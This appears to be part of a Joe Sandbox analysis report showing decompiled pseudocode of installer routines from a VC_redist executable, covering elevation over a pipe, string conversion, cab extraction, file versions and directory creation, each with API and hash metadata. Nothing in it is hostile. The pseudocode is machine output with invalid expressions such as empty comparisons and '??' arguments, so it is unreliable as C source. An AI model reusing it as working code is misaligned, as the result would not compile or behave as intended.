                                                                          								goto L17;
                                                                          							}
                                                                          							_push(0x2000000b);
                                                                          							_push(2); // executed
                                                                          							E000B550F(); // executed
                                                                          							_t29 = E000C52E3(_t41); // executed
                                                                          							_t64 = _t29;
                                                                          							if(_t64 < 0) {
                                                                          								_push("Failed to connect to elevated child process.");
                                                                          								goto L16;
                                                                          							} else {
                                                                          								_push(0x2000000c);
                                                                          								_push(2); // executed
                                                                          								E000B550F(); // executed
                                                                          								goto L13;
                                                                          							}
                                                                          						} else {
                                                                          							_push("Failed to create pipe and cache pipe.");
                                                                          							goto L16;
                                                                          						}
                                                                          					} else {
                                                                          						_push("Failed to create pipe name and client token.");
                                                                          						L16:
                                                                          						_push(_t64);
                                                                          						E000F012F();
                                                                          					}
                                                                          					L17:
                                                                          				} else {
                                                                          					E000B37D3(_t21, "elevation.cpp", 0x100, _t61);
                                                                          					_push("UX aborted elevation requirement.");
                                                                          					_push(_t61);
                                                                          					E000F012F();
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					CloseHandle(_v8);
                                                                          					_v8 = _v8 & 0x00000000;
                                                                          				}
                                                                          				if(_t64 < 0) {
                                                                          					E000C4B2B(_t58 + 0x4a0);
                                                                          				}
                                                                          				return _t64;
                                                                          			}


                                                                          APIs
                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000001,000FB4F0,?,00000001,000000FF,?,?,76B6A770,00000000,00000001,00000000,?,000C72F3), ref: 000CD32F
                                                                          Strings
                                                                          • UX aborted elevation requirement., xrefs: 000CD244
                                                                          • Failed to connect to elevated child process., xrefs: 000CD318
                                                                          • elevation.cpp, xrefs: 000CD23A
                                                                          • Failed to create pipe and cache pipe., xrefs: 000CD28C
                                                                          • Failed to elevate., xrefs: 000CD311
                                                                          • Failed to create pipe name and client token., xrefs: 000CD270
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle
                                                                          • String ID: Failed to connect to elevated child process.$Failed to create pipe and cache pipe.$Failed to create pipe name and client token.$Failed to elevate.$UX aborted elevation requirement.$elevation.cpp
                                                                          • API String ID: 2962429428-3003415917
                                                                          • Opcode ID: 07ece0e029765fd1fe5752fc55bdb072049003057123b2b744ecf9a313f0f1e4
                                                                          • Instruction ID: ffd5847487f7b05e97d13485f3af8937b4b9ccc6a0d922f84157ddd4eeb7f84d
                                                                          • Opcode Fuzzy Hash: 07ece0e029765fd1fe5752fc55bdb072049003057123b2b744ecf9a313f0f1e4
                                                                          • Instruction Fuzzy Hash: BE31EB72B45662BBE72557609C46FEF775CAF00721F10016FF905A71C3DB91AE0082A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 28%
                                                                          			E000B2436(signed int __edx, intOrPtr* _a4, short* _a8, signed int _a12, int _a16) {
                                                                          				signed int _t16;
                                                                          				int _t17;
                                                                          				signed int _t18;
                                                                          				signed short _t22;
                                                                          				intOrPtr _t23;
                                                                          				intOrPtr* _t25;
                                                                          				signed short _t28;
                                                                          				int _t31;
                                                                          				short* _t40;
                                                                          				void* _t41;
                                                                          				intOrPtr _t43;
                                                                          				int _t45;
                                                                          				signed int _t48;
                                                                          				int _t50;
                                                                          				int _t52;
                                                                          				intOrPtr* _t53;
                                                                          
                                                                          				_t39 = _a4;
                                                                          				_t45 = __edx | 0xffffffff;
                                                                          				_t16 = _a12;
                                                                          				_t31 = 0;
                                                                          				_t52 = 0;
                                                                          				_t48 = _t16;
                                                                          				if( *_a4 == 0) {
                                                                          					L4:
                                                                          					_t40 = _a8;
                                                                          					if(_t16 != 0) {
                                                                          						if(0 == _t40[_t16]) {
                                                                          							_t7 = _t16 - 1; // 0xca1ac
                                                                          							_t48 = _t7;
                                                                          						}
                                                                          						L11:
                                                                          						_t8 = _t48 + 1; // 0xca1ad
                                                                          						_t17 = _t8;
                                                                          						if(_t52 >= _t17) {
                                                                          							L20:
                                                                          							_t18 = _a12;
                                                                          							_push(_t31);
                                                                          							_push(_t31);
                                                                          							_push(_t52);
                                                                          							_t53 = _a4;
                                                                          							_push( *_t53);
                                                                          							_t41 = 0xffffffff;
                                                                          							_t19 =  ==  ? _t41 : _t18;
                                                                          							if(WideCharToMultiByte(_a16, _t31, _a8,  ==  ? _t41 : _t18, ??, ??, ??, ??) != 0) {
                                                                          								 *(_t48 +  *_t53) = _t31;
                                                                          								L23:
                                                                          								return _t31;
                                                                          							}
                                                                          							_t22 = GetLastError();
                                                                          							_t35 =  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
                                                                          							_t23 = 0x80004005;
                                                                          							_t31 =  >=  ? 0x80004005 :  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
                                                                          							_push(_t31);
                                                                          							_push(0x1de);
                                                                          							L7:
                                                                          							_push("strutil.cpp");
                                                                          							E000B37D3(_t23);
                                                                          							goto L23;
                                                                          						}
                                                                          						_t52 = _t17;
                                                                          						if(_t52 < 0x7fffffff) {
                                                                          							_t25 = _a4;
                                                                          							_push(1);
                                                                          							_push(_t52);
                                                                          							if( *_t25 == _t31) {
                                                                          								_t23 = E000B38D4(); // executed
                                                                          							} else {
                                                                          								_push( *_t25);
                                                                          								_t23 = E000B3A72();
                                                                          							}
                                                                          							_t43 = _t23;
                                                                          							if(_t43 != 0) {
                                                                          								 *_a4 = _t43;
                                                                          								goto L20;
                                                                          							} else {
                                                                          								_t31 = 0x8007000e;
                                                                          								_push(0x8007000e);
                                                                          								_push(0x1d7);
                                                                          								goto L7;
                                                                          							}
                                                                          						}
                                                                          						_t31 = 0x8007000e;
                                                                          						goto L23;
                                                                          					}
                                                                          					_t50 = WideCharToMultiByte(_a16, _t31, _t40, _t45, _t31, _t31, _t31, _t31);
                                                                          					if(_t50 != 0) {
                                                                          						_t48 = _t50 - 1;
                                                                          						goto L11;
                                                                          					}
                                                                          					_t28 = GetLastError();
                                                                          					_t38 =  <=  ? _t28 : _t28 & 0x0000ffff | 0x80070000;
                                                                          					_t23 = 0x80004005;
                                                                          					_t31 =  >=  ? 0x80004005 :  <=  ? _t28 : _t28 & 0x0000ffff | 0x80070000;
                                                                          					_push(_t31);
                                                                          					_push(0x1bc);
                                                                          					goto L7;
                                                                          				}
                                                                          				_t52 = E000B3B51( *_t39);
                                                                          				_t45 = _t45 | 0xffffffff;
                                                                          				if(_t52 != _t45) {
                                                                          					_t16 = _t48;
                                                                          					goto L4;
                                                                          				}
                                                                          				_t31 = 0x80070057;
                                                                          				goto L23;
                                                                          			}


                                                                          APIs
                                                                          • WideCharToMultiByte.KERNEL32(000EFEE7,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000EFEE7,000CA1AD,00000000,00000000), ref: 000B247C
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000EFEE7,000CA1AD,00000000,00000000,0000FDE9), ref: 000B2488
                                                                            • Part of subcall function 000B3B51: GetProcessHeap.KERNEL32(00000000,?,?,000B3ADE,?,00000000,00000000,?,000B1472,?,00000000,00000000,00000000,00000000,?), ref: 000B3B59
                                                                            • Part of subcall function 000B3B51: HeapSize.KERNEL32(00000000,?,000B3ADE,?,00000000,00000000,?,000B1472,?,00000000,00000000,00000000,00000000,?,?,000B1511), ref: 000B3B60
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                                          • String ID: @Met$strutil.cpp
                                                                          • API String ID: 3662877508-569070560
                                                                          • Opcode ID: 1257e87b4a76c53484ebdc27ca11c8129d05a64b9d11d5dbcb656f3e06d2213b
                                                                          • Instruction ID: b4413e4a60c937dff672c32669032bea97fc4c367c99d7944658ea7d8538b39c
                                                                          • Opcode Fuzzy Hash: 1257e87b4a76c53484ebdc27ca11c8129d05a64b9d11d5dbcb656f3e06d2213b
                                                                          • Instruction Fuzzy Hash: 6731A071200719AFFB21AE69CC94AFB72DDEB44764B204229F915DB5A0EB75CC40DB60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 59%
                                                                          			E000D07E4(signed int __edx, void* _a4, union _LARGE_INTEGER _a8, intOrPtr _a12) {
                                                                          				union _LARGE_INTEGER* _v8;
                                                                          				intOrPtr _v12;
                                                                          				void* _v16;
                                                                          				intOrPtr _t32;
                                                                          				signed short _t36;
                                                                          				signed short _t41;
                                                                          				signed short _t42;
                                                                          				void* _t46;
                                                                          				union _LARGE_INTEGER _t52;
                                                                          				signed int _t55;
                                                                          				signed int _t56;
                                                                          				intOrPtr _t60;
                                                                          				intOrPtr _t61;
                                                                          				signed short _t64;
                                                                          
                                                                          				_t55 =  *0x11aac0; // 0x0
                                                                          				_t61 = 0;
                                                                          				_v16 = 0;
                                                                          				_v12 = 0;
                                                                          				_t60 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t55 * 4)) + 4));
                                                                          				_t32 = _a12;
                                                                          				if(_t32 == 0) {
                                                                          					asm("cdq");
                                                                          					_t56 = __edx;
                                                                          					_t52 = _a8.LowPart +  *((intOrPtr*)(_t60 + 8));
                                                                          					asm("adc ecx, [edi+0xc]");
                                                                          					goto L7;
                                                                          				} else {
                                                                          					_t46 = _t32 - 1;
                                                                          					if(_t46 == 0) {
                                                                          						asm("cdq");
                                                                          						_t52 = _a8.LowPart;
                                                                          						_t56 = __edx;
                                                                          						goto L7;
                                                                          					} else {
                                                                          						if(_t46 == 1) {
                                                                          							_t56 =  *(_t60 + 0x14);
                                                                          							asm("adc ecx, [edi+0xc]");
                                                                          							asm("cdq");
                                                                          							_t52 =  *((intOrPtr*)(_t60 + 0x10)) +  *((intOrPtr*)(_t60 + 8)) + _a8.LowPart;
                                                                          							asm("adc ecx, edx");
                                                                          							L7:
                                                                          							_v8 = _t56;
                                                                          							_t36 = E000D11CF(__eflags, _t60 + 0x1c, _a4, _t52, _t56,  &_v16, _a12);
                                                                          							__eflags = _t36;
                                                                          							if(_t36 == 0) {
                                                                          								L10:
                                                                          								_t25 =  &_v16;
                                                                          								 *_t25 = _v16 -  *((intOrPtr*)(_t60 + 8));
                                                                          								__eflags =  *_t25;
                                                                          							} else {
                                                                          								_push(_a12);
                                                                          								_t41 = SetFilePointerEx(_a4, _t52, _v8,  &_v16); // executed
                                                                          								__eflags = _t41;
                                                                          								if(_t41 != 0) {
                                                                          									goto L10;
                                                                          								} else {
                                                                          									_t42 = GetLastError();
                                                                          									__eflags = _t42;
                                                                          									_t64 =  <=  ? _t42 : _t42 & 0x0000ffff | 0x80070000;
                                                                          									__eflags = _t64;
                                                                          									_t61 =  >=  ? 0x80004005 : _t64;
                                                                          									E000B37D3(0x80004005, "cabextract.cpp", 0x345, _t61);
                                                                          									E000F012F(_t61, "Failed to move file pointer 0x%x bytes.", _a8);
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							_t61 = 0x80070057;
                                                                          							_push("Invalid seek type.");
                                                                          							E000F012F();
                                                                          							_t56 = 0x80070057;
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				 *((intOrPtr*)(_t60 + 0x30)) = _t61;
                                                                          				_t39 =  <  ? _t56 | 0xffffffff : _v16;
                                                                          				return  <  ? _t56 | 0xffffffff : _v16;
                                                                          			}


















                                                                          APIs
                                                                          • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 000D088A
                                                                          • GetLastError.KERNEL32(?,?,?), ref: 000D0894
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastPointer
                                                                          • String ID: @Met$Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
                                                                          • API String ID: 2976181284-1358093670
                                                                          • Opcode ID: 28c98f2ac2048347112e222899a84ad1b2e1cb8c6fe864796d61148b448cf8bf
                                                                          • Instruction ID: f423fa74f340557edaa3e4eb3f505ade31b54c63664e1c66ae769788d5f7e6d5
                                                                          • Opcode Fuzzy Hash: 28c98f2ac2048347112e222899a84ad1b2e1cb8c6fe864796d61148b448cf8bf
                                                                          • Instruction Fuzzy Hash: 67318471A40619FFDB14DF69CC84AA9B7A9FF04720F00822AF91997751DB71E910DBE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 58%
                                                                          			E000F4932(intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                                                          				void* _v8;
                                                                          				char _v12;
                                                                          				char _v16;
                                                                          				long _t15;
                                                                          				char* _t18;
                                                                          				long _t25;
                                                                          				intOrPtr _t28;
                                                                          				void* _t31;
                                                                          				int _t32;
                                                                          
                                                                          				_t15 =  &_v8;
                                                                          				_push(_t15);
                                                                          				_push(_a4);
                                                                          				_t32 = 0;
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				_v16 = 0;
                                                                          				L000F94F0(); // executed
                                                                          				_t25 = _t15;
                                                                          				if(_t25 != 0) {
                                                                          					L4:
                                                                          					_t16 = GlobalAlloc(0, _t25);
                                                                          					_t31 = _t16;
                                                                          					if(_t31 != 0) {
                                                                          						_push(_t31);
                                                                          						_push(_t25);
                                                                          						_push(_v8);
                                                                          						_push(_a4);
                                                                          						L000F9500(); // executed
                                                                          						if(_t16 != 0) {
                                                                          							L10:
                                                                          							_push( &_v16);
                                                                          							_t18 =  &_v12;
                                                                          							_push(_t18);
                                                                          							_push("\\");
                                                                          							_push(_t31);
                                                                          							L000F9510();
                                                                          							if(_t18 != 0) {
                                                                          								L13:
                                                                          								_t28 = _v12;
                                                                          								 *_a8 =  *((intOrPtr*)(_t28 + 8));
                                                                          								 *_a12 =  *((intOrPtr*)(_t28 + 0xc));
                                                                          							} else {
                                                                          								_t32 =  <=  ? GetLastError() : _t22 & 0x0000ffff | 0x80070000;
                                                                          								if(_t32 >= 0) {
                                                                          									goto L13;
                                                                          								} else {
                                                                          									_push(_t32);
                                                                          									_push(0x122);
                                                                          									goto L9;
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							_t32 =  <=  ? GetLastError() : _t22 & 0x0000ffff | 0x80070000;
                                                                          							if(_t32 >= 0) {
                                                                          								goto L10;
                                                                          							} else {
                                                                          								_push(_t32);
                                                                          								_push(0x11d);
                                                                          								L9:
                                                                          								_push("fileutil.cpp");
                                                                          								E000B37D3(_t22);
                                                                          							}
                                                                          						}
                                                                          						GlobalFree(_t31);
                                                                          					} else {
                                                                          						_t32 = 0x8007000e;
                                                                          						_push(0x8007000e);
                                                                          						_push(0x119);
                                                                          						goto L3;
                                                                          					}
                                                                          				} else {
                                                                          					_t32 =  <=  ? GetLastError() : _t16 & 0x0000ffff | 0x80070000;
                                                                          					if(_t32 >= 0) {
                                                                          						goto L4;
                                                                          					} else {
                                                                          						_push(_t32);
                                                                          						_push(0x115);
                                                                          						L3:
                                                                          						_push("fileutil.cpp");
                                                                          						E000B37D3(_t16);
                                                                          					}
                                                                          				}
                                                                          				return _t32;
                                                                          			}













                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 000F495A
                                                                          • GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 000F4989
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000), ref: 000F49B3
                                                                          • GetLastError.KERNEL32(00000000,000FB790,?,?,?,00000000,00000000,00000000), ref: 000F49F4
                                                                          • GlobalFree.KERNEL32 ref: 000F4A28
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$Global$AllocFree
                                                                          • String ID: @Met$fileutil.cpp
                                                                          • API String ID: 1145190524-2299628883
                                                                          • Opcode ID: 166e4397dab7b35d87f76c09be507d8a04e7b3e7940850cd89329f50520e83f4
                                                                          • Instruction ID: 8fe2ffe638b8a602227687bc4cc0e5ebafb529dbdee73b02c865ab5950542c8f
                                                                          • Opcode Fuzzy Hash: 166e4397dab7b35d87f76c09be507d8a04e7b3e7940850cd89329f50520e83f4
                                                                          • Instruction Fuzzy Hash: D221E535A4032DABD7219BA58C44EFFBBA8EF80360F004126FE05E7601DB74CD00EAA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 42%
                                                                          			E000B7203(void* __ecx, struct _CRITICAL_SECTION* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				void* _t29;
                                                                          				void* _t37;
                                                                          				char* _t38;
                                                                          				signed int _t46;
                                                                          				void* _t49;
                                                                          
                                                                          				_t41 = __ecx;
                                                                          				_push(__ecx);
                                                                          				_push(__ecx);
                                                                          				_v12 = _v12 & 0x00000000;
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				EnterCriticalSection(_a4);
                                                                          				_t29 = E000B5C87(_t41, _a4, _a8,  &_v12);
                                                                          				_t46 = _v12;
                                                                          				_t49 = _t29;
                                                                          				if(_t49 < 0 ||  *((intOrPtr*)(_t46 + 0x18)) != 0) {
                                                                          					if(_t49 == 0x80070490) {
                                                                          						goto L18;
                                                                          					}
                                                                          					if(_t49 >= 0) {
                                                                          						if( *((intOrPtr*)(_t46 + 0x18)) != 2 ||  *((intOrPtr*)(_t46 + 0x2c)) != 0 ||  *((intOrPtr*)(_t46 + 0x24)) != 0) {
                                                                          							_t24 = _t46 + 8; // 0x8
                                                                          							_t49 = E000D00E0(_t24, _a12);
                                                                          							if(_t49 >= 0) {
                                                                          								goto L18;
                                                                          							}
                                                                          							_push(_a8);
                                                                          							_push("Failed to get value as string for variable: %ls");
                                                                          							L17:
                                                                          							_push(_t49);
                                                                          							E000F012F();
                                                                          						} else {
                                                                          							_t16 = _t46 + 8; // 0x8
                                                                          							_t49 = E000D00E0(_t16,  &_v8);
                                                                          							if(_t49 >= 0) {
                                                                          								_t37 = E000B567D(_a4, _v8, _a12, 0, 0); // executed
                                                                          								_t49 = _t37;
                                                                          								if(_t49 < 0) {
                                                                          									_t38 = L"*****";
                                                                          									if( *((intOrPtr*)(_t46 + 0x20)) == 0) {
                                                                          										_t38 =  *(_t46 + 8);
                                                                          									}
                                                                          									_push(_a8);
                                                                          									E000F012F(_t49, "Failed to format value \'%ls\' of variable: %ls", _t38);
                                                                          								}
                                                                          							} else {
                                                                          								_push("Failed to get unformatted string.");
                                                                          								_push(_t49);
                                                                          								E000F012F();
                                                                          							}
                                                                          						}
                                                                          						goto L18;
                                                                          					}
                                                                          					_push(_a8);
                                                                          					_push("Failed to get variable: %ls");
                                                                          					goto L17;
                                                                          				} else {
                                                                          					_t49 = 0x80070490;
                                                                          					L18:
                                                                          					LeaveCriticalSection(_a4);
                                                                          					E000B2793(_v8);
                                                                          					return _t49;
                                                                          				}
                                                                          			}











                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,?,?,000B583F,000002C0,000002C0,00000000,00000100,00000001,00000000,000002C0,00000002), ref: 000B7215
                                                                          • LeaveCriticalSection.KERNEL32(00000000,00000000,00000002,00000000,?,?,?,000B583F,000002C0,000002C0,00000000,00000100,00000001,00000000,000002C0,00000002), ref: 000B72F4
                                                                          Strings
                                                                          • *****, xrefs: 000B72B0, 000B72BD
                                                                          • Failed to get value as string for variable: %ls, xrefs: 000B72E3
                                                                          • Failed to format value '%ls' of variable: %ls, xrefs: 000B72BE
                                                                          • Failed to get variable: %ls, xrefs: 000B7256
                                                                          • Failed to get unformatted string., xrefs: 000B7285
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID: *****$Failed to format value '%ls' of variable: %ls$Failed to get unformatted string.$Failed to get value as string for variable: %ls$Failed to get variable: %ls
                                                                          • API String ID: 3168844106-2873099529
                                                                          • Opcode ID: c50e477045ea201a2b1c341aad16de260363d0e04c89ec1f71316edf6cc1a6ee
                                                                          • Instruction ID: a24ca4ec534f2fe82bcafab3e3bde0f0c0e38ea10f336332be704f8f7b6c7a60
                                                                          • Opcode Fuzzy Hash: c50e477045ea201a2b1c341aad16de260363d0e04c89ec1f71316edf6cc1a6ee
                                                                          • Instruction Fuzzy Hash: CA31A03290461EBBDF229B50CC06FEE7B65EF54320F104125FA086AA51D736AE60EBD4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 96%
                                                                          			E000B4013(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8) {
                                                                          				int _t5;
                                                                          				long _t7;
                                                                          				short _t12;
                                                                          				signed short _t14;
                                                                          				short* _t17;
                                                                          				WCHAR* _t19;
                                                                          				WCHAR* _t21;
                                                                          				short _t22;
                                                                          
                                                                          				_t21 = _a4;
                                                                          				_t22 = 0;
                                                                          				_t5 = CreateDirectoryW(_t21, _a8); // executed
                                                                          				if(_t5 != 0) {
                                                                          					L17:
                                                                          					return _t22;
                                                                          				}
                                                                          				_t7 = GetLastError();
                                                                          				if(_t7 != 0xb7) {
                                                                          					if(_t7 == 3 || E000B40E2(_t21, 0) == 0) {
                                                                          						_t8 =  *_t21 & 0x0000ffff;
                                                                          						_t19 = _t21;
                                                                          						_t17 = 0;
                                                                          						if(( *_t21 & 0x0000ffff) == 0) {
                                                                          							L15:
                                                                          							_t22 = 0x80070003;
                                                                          							E000B37D3(_t8, "dirutil.cpp", 0x72, 0x80070003);
                                                                          							goto L16;
                                                                          						} else {
                                                                          							_push(0x5c);
                                                                          							do {
                                                                          								_t17 =  ==  ? _t19 : _t17;
                                                                          								_t19 =  &(_t19[1]);
                                                                          								_t8 =  *_t19 & 0x0000ffff;
                                                                          							} while (( *_t19 & 0x0000ffff) != 0);
                                                                          							if(_t17 == 0) {
                                                                          								goto L15;
                                                                          							} else {
                                                                          								 *_t17 = 0;
                                                                          								_t22 = E000B4013(_t21, _a8);
                                                                          								_t12 = 0x5c;
                                                                          								 *_t17 = _t12;
                                                                          								if(_t22 >= 0) {
                                                                          									if(CreateDirectoryW(_t21, _a8) != 0) {
                                                                          										_t22 = 0;
                                                                          									} else {
                                                                          										_t14 = GetLastError();
                                                                          										if(_t14 != 0xb7) {
                                                                          											_t22 =  <=  ? _t14 : _t14 & 0x0000ffff | 0x80070000;
                                                                          										} else {
                                                                          											_t22 = 1;
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          								L16:
                                                                          								goto L17;
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						goto L2;
                                                                          					}
                                                                          				}
                                                                          				L2:
                                                                          				_t22 = 0;
                                                                          				goto L17;
                                                                          			}












                                                                          APIs
                                                                          • CreateDirectoryW.KERNELBASE(00000003,00000001,00000000,00000000,?,000F416C,00000001,00000000,?,000F4203,00000003,00000001,00000001,00000000,00000000,00000000), ref: 000B4021
                                                                          • GetLastError.KERNEL32(?,000F416C,00000001,00000000,?,000F4203,00000003,00000001,00000001,00000000,00000000,00000000,?,000CA55D,?,00000000), ref: 000B402F
                                                                          • CreateDirectoryW.KERNEL32(00000003,00000001,00000001,?,000F416C,00000001,00000000,?,000F4203,00000003,00000001,00000001,00000000,00000000,00000000), ref: 000B4097
                                                                          • GetLastError.KERNEL32(?,000F416C,00000001,00000000,?,000F4203,00000003,00000001,00000001,00000000,00000000,00000000,?,000CA55D,?,00000000), ref: 000B40A1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID: @Met$dirutil.cpp
                                                                          • API String ID: 1375471231-1953925360
                                                                          • Opcode ID: b892fb3f3b91712c32c72e8ee6a3969a4ac0a693ae0544320d8323980a206ce3
                                                                          • Instruction ID: 7bc124b762216b01c43d06a94e5b15996426bd078ccae56b4ad50171dd5020b5
                                                                          • Opcode Fuzzy Hash: b892fb3f3b91712c32c72e8ee6a3969a4ac0a693ae0544320d8323980a206ce3
                                                                          • Instruction Fuzzy Hash: AC112735A10232A6EB303AA18C44BFBB6A4EF54760F104125FF05EB052D7348E01A6E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 63%
                                                                          			E000D09B8(intOrPtr _a4, intOrPtr _a8) {
                                                                          				struct _FILETIME _v12;
                                                                          				struct _FILETIME _v20;
                                                                          				intOrPtr _t23;
                                                                          				void* _t35;
                                                                          				intOrPtr _t43;
                                                                          				signed int _t44;
                                                                          
                                                                          				_t43 = _a4;
                                                                          				_t44 = 0;
                                                                          				_v20.dwLowDateTime = 0;
                                                                          				_v20.dwHighDateTime = 0;
                                                                          				_v12.dwLowDateTime = 0;
                                                                          				_v12.dwHighDateTime = 0;
                                                                          				_t23 =  *((intOrPtr*)(_t43 + 0x2c));
                                                                          				if(_t23 == 0) {
                                                                          					if(DosDateTimeToFileTime( *(_a8 + 0x18) & 0x0000ffff,  *(_a8 + 0x1a) & 0x0000ffff,  &_v20) != 0 && LocalFileTimeToFileTime( &_v20,  &_v12) != 0) {
                                                                          						SetFileTime( *(_t43 + 0x3c),  &_v12,  &_v12,  &_v12); // executed
                                                                          					}
                                                                          					if( *(_t43 + 0x3c) != 0xffffffff) {
                                                                          						FindCloseChangeNotification( *(_t43 + 0x3c)); // executed
                                                                          						 *(_t43 + 0x3c) =  *(_t43 + 0x3c) | 0xffffffff;
                                                                          					}
                                                                          				} else {
                                                                          					_t35 = _t23 - 1;
                                                                          					if(_t35 != 0) {
                                                                          						_t37 = _t35 == 0;
                                                                          						if(_t35 == 0) {
                                                                          							_t44 = 0x80004004;
                                                                          						} else {
                                                                          							_t44 = 0x8007139f;
                                                                          							E000B37D3(_t37, "cabextract.cpp", 0x296, 0x8007139f);
                                                                          							_push("Invalid operation for this state.");
                                                                          							_push(0x8007139f);
                                                                          							E000F012F();
